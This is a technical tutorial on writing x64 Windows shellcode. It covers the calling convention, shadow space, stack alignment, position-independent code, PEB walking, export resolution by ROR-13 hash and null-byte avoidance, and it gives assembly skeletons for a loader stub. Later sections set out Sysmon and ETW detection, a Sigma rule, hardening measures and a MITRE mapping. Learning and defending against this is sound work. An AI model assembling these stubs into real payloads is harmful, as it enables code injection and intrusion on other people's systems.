Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.

1. From x86 to x64: What Actually Changed

Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can appear to run cleanly while silently corrupting the host process, then crash three calls later inside an SSE instruction, with nothing pointing back at the real cause.

Item	x86	x64
General-purpose registers	8 × 32-bit (`EAX`…`EDI`)	16 × 64-bit (`RAX`…`R15`)
Windows calling convention	`stdcall` / `cdecl` — all args on stack	Unified fast-call — first 4 integer args in registers
TEB segment register	`FS`; PEB at `fs:[0x30]`	`GS`; PEB at `gs:[0x60]`
Address width	32-bit	64-bit (48-bit canonical VA in practice)
`call` pushes	4-byte return address	8-byte return address
RIP-relative addressing	Not available	Available; `lea rax, [rip + offset]` is idiomatic in PIC

Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.

2. The Microsoft x64 ABI Deep-Dive

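The Microsoft x64 calling convention passes the first four arguments in registers: integer and pointer arguments in RCX, RDX, R8, and R9, floating-point arguments in the low halves of XMM0 to XMM3. The slots are positional, so a floating-point second argument travels in XMM1 and leaves RDX unused. Anything beyond the fourth argument goes on the stack, above the shadow space, laid out right-to-left so that the fifth argument sits at the lowest address.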

Argument #	Integer Register	Floating-Point Register
1st	`RCX`	`XMM0L`
2nd	`RDX`	`XMM1L`
3rd	`R8`	`XMM2L`
4th	`R9`	`XMM3L`
5th+	Stack (above shadow space)	Stack

The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.
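
The positional nature of the register slots is easy to get wrong, so here is a minimal Python sketch of the assignment rule. The helper name `assign_slots` and the `"int"` / `"float"` labels are illustrative assumptions, not part of any toolchain; stack locations are shown from the caller's side just before the `call`.

```python
# Hypothetical helper: where does each argument of a Microsoft x64 call live?
INT_REGS = ["RCX", "RDX", "R8", "R9"]
FLT_REGS = ["XMM0", "XMM1", "XMM2", "XMM3"]


def assign_slots(arg_kinds):
    """arg_kinds is a list of "int" or "float"; returns one location per argument."""
    locations = []
    for index, kind in enumerate(arg_kinds):
        if index < 4:
            # Slots are positional: argument N uses register N of its class,
            # and the matching register of the other class stays unused.
            regs = FLT_REGS if kind == "float" else INT_REGS
            locations.append(regs[index])
        else:
            # Caller's view before `call`: shadow space is [rsp+0x00 .. rsp+0x1F],
            # so the fifth argument starts at [rsp+0x20].
            locations.append(f"[rsp+0x{0x20 + 8 * (index - 4):02X}]")
    return locations


print(assign_slots(["int", "float", "int", "int", "int"]))
```

A floating-point second argument lands in XMM1 rather than XMM0, which is the detail most hand-written call sequences miss.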

Volatile vs Non-Volatile Registers

Class	Registers
Volatile	`RAX`, `RCX`, `RDX`, `R8`, `R9`, `R10`, `R11`, `XMM0`–`XMM5`
Non-volatile	`RBX`, `RBP`, `RDI`, `RSI`, `RSP`, `R12`, `R13`, `R14`, `R15`, `XMM6`–`XMM15`

A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.

Side-by-Side: x86 Push vs x64 Register Load

; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0              ; uType
push title          ; lpCaption
push msg            ; lpText
push 0              ; hWnd
call [MessageBoxA]  ; callee cleans the stack

; --- x64 fastcall: same call ---
xor  ecx, ecx                       ; hWnd      = NULL (32-bit write zero-extends into RCX)
lea  rdx, [rel msg]                 ; lpText
lea  r8,  [rel title]               ; lpCaption
xor  r9d, r9d                       ; uType     = 0
sub  rsp, 0x28                      ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add  rsp, 0x28

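Note xor r9d, r9d rather than xor r9, r9: writing to a 32-bit sub-register zero-extends into the full 64-bit register, so the 32-bit form clears all of R9. For the legacy registers the 32-bit form is also shorter, because it drops the REX.W prefix (xor ecx, ecx is 31 C9, while xor rcx, rcx is 48 31 C9). For R8 to R15 a REX prefix is required either way, so both forms are three bytes. Neither form contains a null byte.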

Figure: The Microsoft x64 ABI passes the first four integer arguments in registers (RCX, RDX, R8, R9) and returns the result in RAX; additional arguments land on the stack above the shadow space.

3. Shadow Space: Why, What, and Where

In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.

Critical points:

Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
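It is allocated by the caller but belongs to the callee for the duration of the call. The callee may overwrite it without saving the previous contents.
The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
On entry to the callee, stack arguments beyond the fourth begin at [RSP + 0x28] (8 bytes return address + 32 bytes shadow). From the caller's side, just before the call, the same slot is [RSP + 0x20].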

Layout immediately after `call`, before callee prologue	Offset from `RSP`
Return address (pushed by `call`)	`[RSP + 0x00]`
Shadow slot for `RCX`	`[RSP + 0x08]`
Shadow slot for `RDX`	`[RSP + 0x10]`
Shadow slot for `R8`	`[RSP + 0x18]`
Shadow slot for `R9`	`[RSP + 0x20]`
5th argument (if any)	`[RSP + 0x28]`

Skip the shadow allocation and the first thing the callee does (often a mov [rsp+8], rcx early in a Win32 prologue) lands on whatever sits directly above its return address: your own stack frame or, worse, the return address your code needs to get back to its own caller.
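
The offsets in the layout table follow one formula, which the short Python sketch below reproduces. The function name `callee_entry_offset` is a hypothetical helper introduced only for this illustration.

```python
def callee_entry_offset(arg_number):
    """Offset from RSP, on entry to the callee, of the slot for a 1-based argument.

    Slots 1-4 are the shadow (home) slots; slots 5+ are real stack arguments.
    """
    return_address_size = 8   # pushed by `call`
    slot_size = 8             # every argument slot is 8 bytes wide
    return return_address_size + slot_size * (arg_number - 1)


for n in range(1, 7):
    kind = "home slot" if n <= 4 else "stack argument"
    print(f"arg {n}: [rsp+0x{callee_entry_offset(n):02X}]  ({kind})")
```

The fifth argument comes out at 0x28, matching the table: one return address plus four home slots.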

Figure: The caller always reserves 32 bytes of shadow space directly above the return address; on entry to the callee, additional stack arguments start at RSP+0x28.

4. Stack Alignment in Practice

The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.

This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:

0x20 (32 bytes) for shadow space.
+ 0x08 to undo the misalignment the preceding call introduced.

; Canonical shellcode call wrapper
sub rsp, 0x28          ; 32B shadow + 8B realign
call rax               ; rax = resolved API address
add rsp, 0x28

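When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly. After the and, RSP is already on a 16-byte boundary, so only the 32 bytes of shadow space are subtracted; adding the extra 8 here would reintroduce the misalignment:

; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0   ; force 16-byte alignment
sub rsp, 0x20                  ; shadow space only; RSP stays 16-byte aligned at each call

To diagnose alignment faults in WinDbg, disassemble at the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the moment of the call, the reservation is off by 8: either the + 0x08 was forgotten after a call-style entry, or it was added after an explicit and rsp, -16.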
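
The two entry situations need different reservations, and the arithmetic is quick to check. The following Python sketch models RSP as a plain integer; the function names and the sample address are assumptions chosen for illustration.

```python
def rsp_at_next_call(entry_rsp, reserve, force_align=False):
    """RSP value at the shellcode's first outgoing `call`.

    entry_rsp   : RSP when the first shellcode instruction runs
    reserve     : bytes subtracted by `sub rsp, reserve`
    force_align : True if `and rsp, -16` runs before the subtraction
    """
    rsp = entry_rsp
    if force_align:
        rsp &= ~0xF
    return rsp - reserve


def is_call_aligned(rsp):
    """The ABI wants RSP to be a multiple of 16 at the moment of a call."""
    return rsp % 16 == 0


# Entered via `call` from conforming code: RSP is 16N + 8 on entry.
entry = 0x7FFEF000 - 8          # hypothetical address
print(is_call_aligned(rsp_at_next_call(entry, 0x28)))                     # True
print(is_call_aligned(rsp_at_next_call(entry, 0x20)))                     # False

# Entry state unknown, alignment forced first.
print(is_call_aligned(rsp_at_next_call(entry, 0x20, force_align=True)))   # True
print(is_call_aligned(rsp_at_next_call(entry, 0x28, force_align=True)))   # False
```

The same check is useful when reviewing a captured sample: an off-by-8 reservation is a frequent reason a stub crashes inside an SSE move instead of completing.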

5. Position-Independent Code Fundamentals

Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:

RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
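call/pop delta trick. A call to the next instruction pushes its return address, which is the runtime location of the following label. The code at that label pops the value into a register to obtain a base for subsequent offsets.

; Obtain the runtime address of `data` without RIP-relative encoding
    call get_rip
get_rip:
    pop rbx                  ; rbx = runtime address of get_rip
    lea rsi, [rbx + data - get_rip]
    jmp continue
data:
    db "kernel32.dll", 0
continue:

In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when the target encoding demands it. Neither form is automatically free of bad bytes: a call to the very next instruction encodes as E8 00 00 00 00, and a RIP-relative reference to data placed after the instruction carries a small positive disp32 whose high bytes are zero, so check the assembled bytes before relying on either.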
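
To see how the displacement of a RIP-relative operand is formed, and why the direction of the reference matters for the encoded bytes, here is a small Python sketch. The addresses are made up, and the 7-byte length assumes the `48 8D 05 disp32` encoding of `lea rax, [rip + disp32]`.

```python
import struct


def rip_relative_disp32(instr_addr, instr_len, target_addr):
    """Bytes of the disp32 field: target minus the address of the NEXT instruction."""
    displacement = target_addr - (instr_addr + instr_len)
    return struct.pack("<i", displacement)


LEA_LEN = 7  # 48 8D 05 + 4-byte displacement

forward = rip_relative_disp32(0x1000, LEA_LEN, 0x1040)   # data placed after the code
backward = rip_relative_disp32(0x1040, LEA_LEN, 0x1000)  # data placed before the code

print("forward :", forward.hex(" "))    # 39 00 00 00
print("backward:", backward.hex(" "))   # b9 ff ff ff
```

A forward reference yields a small positive displacement padded with zero bytes, while a backward reference yields a negative one padded with 0xFF, which is why the byte-level audit later in this tutorial matters even for position-independent idioms.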

6. PEB Walking: Finding kernel32.dll Without Imports

Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:

Step	Source	Field	Offset (x64)
1	`GS` segment	→ `TEB`	—
2	`TEB`	`ProcessEnvironmentBlock`	`+0x060`
3	`PEB`	`Ldr` → `PEB_LDR_DATA`	`+0x018`
4	`PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x020`
5	`LDR_DATA_TABLE_ENTRY` link	`InMemoryOrderLinks.Flink`	`+0x000`
6	`LDR_DATA_TABLE_ENTRY`	`DllBase` (from `InMemoryOrderLinks`)	`+0x020`

The InMemoryOrderModuleList of a typical process begins with the executable, then ntdll.dll, then kernel32.dll. The list head's Flink points at the executable's entry, and two further Flink dereferences reach the kernel32.dll entry. Because the walk lands on InMemoryOrderLinks (offset 0x10 inside the entry) rather than on the start of the structure, DllBase (0x30 from the start) is read at +0x20 from the link. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because the order is a convention rather than a guarantee; a defender can even perturb the head of the list as a tripwire (see §11).

; --- PEB walk skeleton: locate kernel32.dll base in rax ---
    xor   eax, eax
    mov   rbx, [gs:0x60]        ; TEB -> PEB
    mov   rbx, [rbx + 0x18]     ; PEB -> Ldr (PEB_LDR_DATA)
    mov   rbx, [rbx + 0x20]     ; -> InMemoryOrderModuleList.Flink
                                ;    (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
    mov   rbx, [rbx]            ; advance: -> 2nd entry (ntdll)
    mov   rbx, [rbx]            ; advance: -> 3rd entry (kernel32)
    mov   rax, [rbx + 0x20]     ; DllBase relative to InMemoryOrderLinks (0x30 - 0x10 on x64)
                                ; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:

0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32
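
When no debugger is at hand, the relative offsets can be sanity-checked by modelling the front of the structure. The sketch below uses Python's ctypes with fixed-width fields; the class names and the partial field list are assumptions based on the public symbol layout, so treat the dt output above as authoritative for any given build.

```python
import ctypes


class LIST_ENTRY64(ctypes.Structure):
    _fields_ = [("Flink", ctypes.c_uint64), ("Blink", ctypes.c_uint64)]


class UNICODE_STRING64(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),
                ("MaximumLength", ctypes.c_uint16),
                ("_pad", ctypes.c_uint32),          # explicit padding before the pointer
                ("Buffer", ctypes.c_uint64)]


class LDR_DATA_TABLE_ENTRY64(ctypes.Structure):
    # Only the leading fields are modelled; later fields are irrelevant here.
    _fields_ = [("InLoadOrderLinks", LIST_ENTRY64),
                ("InMemoryOrderLinks", LIST_ENTRY64),
                ("InInitializationOrderLinks", LIST_ENTRY64),
                ("DllBase", ctypes.c_uint64),
                ("EntryPoint", ctypes.c_uint64),
                ("SizeOfImage", ctypes.c_uint32),
                ("_pad", ctypes.c_uint32),
                ("FullDllName", UNICODE_STRING64),
                ("BaseDllName", UNICODE_STRING64)]


entry = LDR_DATA_TABLE_ENTRY64
link = entry.InMemoryOrderLinks.offset
print(f"InMemoryOrderLinks at +0x{link:02X}")
print(f"DllBase            at +0x{entry.DllBase.offset:02X} "
      f"(+0x{entry.DllBase.offset - link:02X} from the link)")
print(f"BaseDllName        at +0x{entry.BaseDllName.offset:02X} "
      f"(+0x{entry.BaseDllName.offset - link:02X} from the link)")
```

The "from the link" figures are the ones a walker that follows InMemoryOrderLinks actually uses, which is also what an analyst should expect to see in a disassembled sample.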

Figure: The PEB walk from GS:[0x60] through PEB_LDR_DATA and InMemoryOrderModuleList to the kernel32.dll entry and its base address.

7. Parsing the Export Address Table

With kernel32.dll’s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.

Key offsets from a loaded module base:

Field	Offset
`e_lfanew` (RVA of PE header)	`DllBase + 0x3C`
Optional Header	`PE_header + 0x18`
Export Directory RVA (PE32+)	`OptHeader + 0x70`
`AddressOfFunctions`	`ExportDir + 0x1C`
`AddressOfNames`	`ExportDir + 0x20`
`AddressOfNameOrdinals`	`ExportDir + 0x24`

; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)

    mov   ecx, [rax + 0x3C]      ; e_lfanew
    add   rcx, rax               ; rcx = PE header
    mov   edx, [rcx + 0x88]      ; Export Directory RVA (OptHdr + 0x70)
    add   rdx, rax               ; rdx = IMAGE_EXPORT_DIRECTORY
    mov   r8d,  [rdx + 0x18]     ; NumberOfNames
    mov   r9d,  [rdx + 0x20]     ; AddressOfNames RVA
    add   r9, rax
    xor   r10, r10               ; index

.next_name:
    mov   esi, [r9 + r10*4]      ; name RVA
    add   rsi, rax               ; rsi -> ASCII export name
    xor   edi, edi               ; hash accumulator

.hash_byte:
    movzx ecx, byte [rsi]        ; ecx is scratch here: rax must keep the module base
    test  cl, cl
    jz    .check
    ror   edi, 13
    add   edi, ecx
    inc   rsi
    jmp   .hash_byte

.check:
    cmp   edi, ebp               ; compare ROR-13 hash
    je    .found
    inc   r10
    cmp   r10d, r8d
    jb    .next_name
    xor   rax, rax               ; not found
    ret
.found:
    ; resolve via AddressOfNameOrdinals + AddressOfFunctions
    ; (omitted for brevity)
    ret

The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard, which is precisely why defenders now key on it (see §11).
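
Analysts usually keep a reference implementation of the hash so that constants found in a sample can be mapped back to export names. Here is a minimal Python sketch of the variant used in the loop above (rotate, then add each byte, stopping before the terminator); the function names are assumptions, and other stubs mix in the module name or the terminating null, so their constants will differ.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name):
    """ROR-13 rotate-and-add hash over the ASCII bytes of an export name."""
    accumulator = 0
    for byte in name.encode("ascii"):
        accumulator = (ror32(accumulator, 13) + byte) & 0xFFFFFFFF
    return accumulator


print(hex(ror13_hash("GetProcAddress")))   # 0x7c0dfcaa
```

Running the function over every export name of a DLL produces a lookup table from constant to API name, which turns opaque immediates in a disassembly into readable annotations.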

8. Null-Byte and Bad-Character Avoidance

Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.

Problem	Fix
`mov rax, 0x000000007FFE1234` in imm64 form → nulls	`mov eax, 0x7FFE1234` (the 32-bit write zero-extends into `RAX`)
64-bit literal in `mov r9, imm64`	`lea r9, [rel label]` or build via shifts/ORs
`push 0` → encodes `6A 00`	`xor ecx, ecx` ; `push rcx`
`mov rcx, 0` → 7 bytes, four of them null (`48 C7 C1 00 00 00 00`)	`xor ecx, ecx`
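
The table rows can be checked without an assembler by looking at the encodings directly. The Python sketch below hard-codes four well-known encodings and reports where zero bytes fall; the dictionary and the helper name `null_offsets` are assumptions made for this illustration.

```python
# Hand-written encodings of the instructions discussed in the table above.
ENCODINGS = {
    "push 0":              bytes.fromhex("6a00"),
    "xor ecx, ecx":        bytes.fromhex("31c9"),
    "mov rcx, 0":          bytes.fromhex("48c7c100000000"),
    "mov eax, 0x7FFE1234": bytes.fromhex("b83412fe7f"),
}


def null_offsets(code):
    """Return the offsets of every 0x00 byte in an encoded instruction."""
    return [offset for offset, byte in enumerate(code) if byte == 0x00]


for text, code in ENCODINGS.items():
    print(f"{text:<22} {code.hex(' '):<22} nulls at {null_offsets(code)}")
```

The same helper works on a whole assembled blob, which is how the audit scripts later in this tutorial are built.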

; --- Null-byte comparison ---
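; BAD: mov rax, 0x76ab1234 encoded in the full imm64 form
;   48 B8 34 12 AB 76 00 00 00 00   <-- four null bytes
; (assembler-dependent: many assemblers pick a shorter encoding when the value fits in 32 bits)
mov rax, 0x76ab1234

; GOOD: zero-extend via 32-bit sub-register
;   31 C0                            <-- xor eax, eax (optional: the mov below already clears the upper half)
;   B8 34 12 AB 76                   <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234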

Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.

A short Python lab to validate a candidate snippet:

from keystone import Ks, KS_ARCH_X86, KS_MODE_64

asm = b"""
    xor eax, eax
    mov eax, 0x76ab1234
    mov rbx, qword ptr gs:[0x60]
    mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")

Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.

9. Shellcode Skeleton: Putting It Together

The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.

[BITS 64]
_start:
    ; --- entry: defensively align stack ---
    and   rsp, 0xFFFFFFFFFFFFFFF0  ; RSP is now 16-byte aligned
    sub   rsp, 0x20                ; shadow space only; RSP stays aligned for each call

    ; --- locate kernel32.dll via PEB ---
    mov   rbx, [gs:0x60]           ; TEB -> PEB
    mov   rbx, [rbx + 0x18]        ; PEB -> Ldr
    mov   rbx, [rbx + 0x20]        ; InMemoryOrderModuleList.Flink (executable's entry)
    mov   rbx, [rbx]               ; -> ntdll entry
    mov   rbx, [rbx]               ; -> kernel32 entry
    mov   r15, [rbx + 0x20]        ; r15 = kernel32 base (DllBase relative to InMemoryOrderLinks)

    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov   rcx, r15
    mov   edx, 0x7C0DFCAA          ; ROR-13("GetProcAddress")  (illustrative)
    call  eat_lookup               ; rax = &GetProcAddress
    mov   r14, rax

    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov   rcx, r15                 ; hModule = kernel32
    lea   rdx, [rel s_LoadLibraryA]
    call  r14                      ; rax = &LoadLibraryA
    lea   rcx, [rel s_user32]
    call  rax                      ; rax = HMODULE user32

    ; --- ... continue resolution and API calls ...

    add   rsp, 0x20
    ret                            ; valid only if the entry RSP was saved before the `and` and restored here (omitted)

s_LoadLibraryA: db "LoadLibraryA", 0
s_user32:       db "user32.dll", 0

; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop; §7 takes the base in rax and the hash in ebp, so adapt the registers)
    ret

Every block in the skeleton corresponds to one of the rules established above: and rsp / sub rsp, 0x20 for alignment plus shadow space, gs:[0x60] for the PEB, [rbx + 0x20] for DllBase, lea + RIP-relative strings for PIC, and r14 / r15 holding state that the called APIs are obliged to preserve. The skeleton itself does not save the caller's RBX, R14, R15, or original RSP; code that must return cleanly to a host thread has to save those at entry and restore them before ret (§2).

10. Common Attacker Techniques

Technique	Description
PEB-walk API resolution	Locate `kernel32.dll` via `gs:[0x60]` chain, parse exports by hash
ROR-13 export hashing	Avoid embedded API name strings; survive static signature scans
RIP-relative PIC	`lea reg, [rel label]` to address embedded data without fixups
Sub-register zero-extension	`mov eax, imm32` to write `RAX` with no null bytes
Shadow-space-aware call wrapping	`sub rsp, 0x28` around every Win32 call from an unknown caller
Direct Win32 → Native API substitution	Call `Nt*` syscalls to bypass usermode hooks (`T1106`)
Reflective loading of a PE in memory	Shellcode bootstraps a full PE image without touching disk (`T1620`)

11. Defensive Strategies & Detection

Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.

Sysmon events to enable and triage:

EventID 1: Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
EventID 8: CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
EventID 10: ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (full access) and 0x1010 (PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ, the classic memory-read mask). Injection additionally needs write-capable rights such as PROCESS_VM_WRITE (0x0020) and PROCESS_VM_OPERATION (0x0008).
EventID 17 / 18: Pipe creation/connection, frequently used by shellcode-launched implants for C2.
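
GrantedAccess values are much easier to triage once they are broken into named rights. The following Python sketch decodes a mask using the documented process access right constants; the function names are assumptions, and bits that are not in the table are reported as a leftover hex value rather than guessed.

```python
PROCESS_RIGHTS = [
    (0x0001, "PROCESS_TERMINATE"),
    (0x0002, "PROCESS_CREATE_THREAD"),
    (0x0008, "PROCESS_VM_OPERATION"),
    (0x0010, "PROCESS_VM_READ"),
    (0x0020, "PROCESS_VM_WRITE"),
    (0x0040, "PROCESS_DUP_HANDLE"),
    (0x0080, "PROCESS_CREATE_PROCESS"),
    (0x0100, "PROCESS_SET_QUOTA"),
    (0x0200, "PROCESS_SET_INFORMATION"),
    (0x0400, "PROCESS_QUERY_INFORMATION"),
    (0x0800, "PROCESS_SUSPEND_RESUME"),
    (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"),
    (0x100000, "SYNCHRONIZE"),
]


def decode_granted_access(mask):
    """Split a Sysmon EventID 10 GrantedAccess value into named rights."""
    names = [name for bit, name in PROCESS_RIGHTS if mask & bit]
    known_bits = sum(bit for bit, _ in PROCESS_RIGHTS)
    leftover = mask & ~known_bits
    if leftover:
        names.append(f"other:0x{leftover:X}")
    return names


def can_write_memory(mask):
    """True if the handle allows writing into the target's address space."""
    return bool(mask & 0x0020)


for value in (0x1FFFFF, 0x1410, 0x1010):
    print(f"0x{value:X}: write={can_write_memory(value)} {decode_granted_access(value)}")
```

Of the three masks shown, only the full-access value carries PROCESS_VM_WRITE; the other two are read-oriented and point toward memory inspection rather than injection.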

ETW providers worth subscribing to in EDR pipelines:

Microsoft-Windows-Kernel-Process: kernel-side process/thread/image events.
Microsoft-Windows-Threat-Intelligence (available only to PPL-protected consumers): kernel-emitted events for memory operations such as NtAllocateVirtualMemory, NtProtectVirtualMemory, and NtWriteVirtualMemory. Because the events originate in the kernel, patching or bypassing user-mode hooks does not suppress them.
Microsoft-Windows-Security-Auditing: handle and object access.

Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.

Behavioural signals defenders should hunt on:

Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
CallTrace containing UNKNOWN frames — the calling instruction lives in unbacked memory.
gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
ROR-13 hashing loops in memory scans.
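
The gs:[0x60] pattern quoted above is specific to a load into RAX; the destination register changes one byte of the encoding. Here is a minimal Python sketch of a scanner that accepts any 64-bit destination register. The regular expression and function name are assumptions for illustration, and legitimate system code contains the same instruction, so hits only matter in unbacked or otherwise unexpected regions.

```python
import re

# mov r64, gs:[0x60]  ->  65 <REX.W> 8B <ModRM> 25 60 00 00 00
#   REX.W is 48 for rax..rdi and 4C for r8..r15
#   ModRM is 00 reg 100 (SIB follows), so only the reg bits vary
GS60_LOAD = re.compile(
    rb"\x65[\x48\x4c]\x8b[\x04\x0c\x14\x1c\x24\x2c\x34\x3c]\x25\x60\x00\x00\x00"
)


def find_peb_loads(buffer):
    """Return the offsets of every `mov r64, gs:[0x60]` in a byte buffer."""
    return [match.start() for match in GS60_LOAD.finditer(buffer)]


sample = b"\x90\x90" + bytes.fromhex("65488b1c2560000000") + b"\xc3"  # mov rbx, gs:[0x60]
print(find_peb_loads(sample))   # [2]
```

A scanner keyed only on the RAX form would miss the walk skeletons in this tutorial, which load the PEB pointer into RBX.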

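Sigma sketch: suspicious cross-process access. The masks below are either full access (0x1FFFFF) or read-oriented (0x1410, 0x1010); an injection-focused variant would also match masks that include PROCESS_VM_WRITE (0x0020).

title: Suspicious Cross-Process Access With Full or Memory-Read Rights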
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'
      - '0x1410'
      - '0x1010'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high

Hardening to deploy on monitored endpoints:

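Arbitrary Code Guard (ACG): stops a process from allocating new executable memory or making existing memory executable, which is the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
Control Flow Guard (CFG): rejects indirect calls to addresses not marked as valid targets. Coverage of shellcode is partial, because executable memory allocated at run time is treated as a valid target unless it was allocated with PAGE_TARGETS_INVALID.
Attack Surface Reduction rules “Block Win32 API calls from Office macros” and “Block all Office applications from creating child processes”: sever one of the most common shellcode delivery vectors.
PPL-protected EDR with kernel ETW Ti subscription: preserves kernel-level telemetry even when userland hooks are patched out.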

One proposed EDR tripwire is to place decoy entries at the head of InMemoryOrderModuleList: shellcode that blindly follows a fixed number of Flinks resolves the decoy module, fails to find the expected exports, and crashes, which yields a high-fidelity detection. Shellcode that matches BaseDllName by hash (§6) is not caught this way.

12. Tools for x64 Shellcode Analysis

Tool	Description	Link
NASM	Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection	`nasm.us`
Keystone Engine	Programmatic assembler (Python bindings) for bad-character analysis labs	`keystone-engine.org`
x64dbg	User-mode debugger; trace shellcode through `gs:[0x60]` and EAT walks	`x64dbg.com`
WinDbg	Inspect `_TEB`, `_PEB`, `_PEB_LDR_DATA`, `_LDR_DATA_TABLE_ENTRY` on the target build	`learn.microsoft.com`
Ghidra / IDA	Static analysis of shellcode-bearing samples and reflective loader stubs	`ghidra-sre.org`
Volatility 3	Memory forensics: enumerate suspicious `MEM_PRIVATE` + `RX` regions, hunt unbacked threads	`volatilityfoundation.org`
Process Hacker	Live triage of thread start addresses and memory protections	`processhacker.sourceforge.io`
Godbolt Compiler Explorer	Inspect MSVC-emitted x64 prologues to confirm ABI assumptions	`godbolt.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Process Injection (umbrella)	`T1055`	Sysmon `EventID 8` + `EventID 10` with VM-write `GrantedAccess`
DLL Injection	`T1055.001`	Image Load (`EventID 7`) of an unsigned or unexpectedly located DLL inside the target process
Portable Executable Injection	`T1055.002`	Volatility scans for PE headers in `MEM_PRIVATE` `RX` regions
APC Injection	`T1055.004`	ETW Ti APC-queue events targeting a remote thread; APC routine addresses in unbacked memory
Process Hollowing	`T1055.012`	`EventID 1` child creation followed by `EventID 10` write-capable access from the parent; Sysmon `EventID 25` (ProcessTampering)
Native API	`T1106`	ETW Ti syscall provider; direct `Nt*` calls outside `ntdll`
Obfuscated Files or Information	`T1027`	YARA on ROR-13 loops; entropy heuristics on dropped payloads
